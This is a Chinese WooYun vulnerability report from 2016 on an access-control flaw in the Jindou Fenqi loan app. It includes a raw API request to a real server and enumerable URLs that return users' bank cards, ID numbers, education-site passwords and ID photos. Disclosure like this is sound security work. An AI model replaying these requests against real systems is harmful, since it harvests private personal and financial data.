当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0203642

漏洞标题:金豆分期越权获取12w用户数据(身份证/手机号/银行卡/学信网账号跟密码)

相关厂商:jindoufenqi.com

漏洞作者: 路人甲

提交时间:2016-04-30 10:34

修复时间:2016-05-09 09:00

公开时间:2016-05-09 09:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-30: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

求个20

详细说明:

http://android.myapp.com/myapp/detail.htm?apkName=com.example.jindou
下载APP
1.越权问题,APP多接口可越权,并能通过burpsuite遍历获取用户数据
例如
获取用户资料接口

POST http://60.211.217.162:9001/fqApi/api/stuUser/getStuUser.do HTTP/1.1
Content-Length: 203
Content-Type: text/plain; charset=UTF-8
Host: 60.211.217.162:9001
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; Google Nexus 4 - 4.1.1 - API 16 - 768x1280_2 Build/JRO03S) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Cookie: JSESSIONID=4360C221EB109302BF98509849CDB560
Cookie2: $Version=1
Accept-Encoding: gzip
{"header":{"device":"Genymotion,Google Nexus 4 - 4.1.1 - API 16 - 768x1280_2,vbox86p","macadd":"123456","platform":"generic,ANDROID,4.1.1"},"request":{"params":{"USER_ID":"110077"},"tokencode":"117386"}}


查看返回数据包涵那些数据(这是user_id=110077的返回数据)

QQ截图20160429224804.png


由上往下分别是
银行卡号,邮箱,身份证,手机号,还有一个手机验证的密码(不知道用来干啥),学信网账号跟密码
遍历user_id

QQ截图20160429223947.png


这边只列出银行卡号跟身份证号还有姓名

QQ截图20160429224058.png


甚至还有用户学信网的账号跟密码
可登陆查看学信档案

QQ截图20160429224552.png


身份证图片文件未授权访问。同样能遍历
手持身份证图片

http://60.211.217.162:9001//opt/xydWeb/ArchFileshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/FqApiUploadFiles/authPic/110077/hold.jpg?time=1461941777435


学生证

http://60.211.217.162:9001//opt/xydWeb/ArchFileshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/FqApiUploadFiles/authPic/110077/stucard.jpg?time=1461941777435


身份证图片

http://60.211.217.162:9001//opt/xydWeb/ArchFileshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/FqApiUploadFiles/authPic/110077/front.jpg?time=1461941777435


同样能遍历,遍历链接中的user_id(上面的userid是110077)
例如

http://60.211.217.162:9001//opt/xydWeb/ArchFileshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/FqApiUploadFiles/authPic/110048/hold.jpg?time=1461941777435


http://60.211.217.162:9001//opt/xydWeb/ArchFileshttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/FqApiUploadFiles/authPic/110047/hold.jpg?time=1461941777435


全站数据,不是问题
3.紧急联系人越权获取

QQ截图20160429230029.png


QQ截图20160429230056.png


同样能遍历,就不演示了

漏洞证明:

修复方案:

加上会话,做好权限控制
给个20Rank吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-05-09 09:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价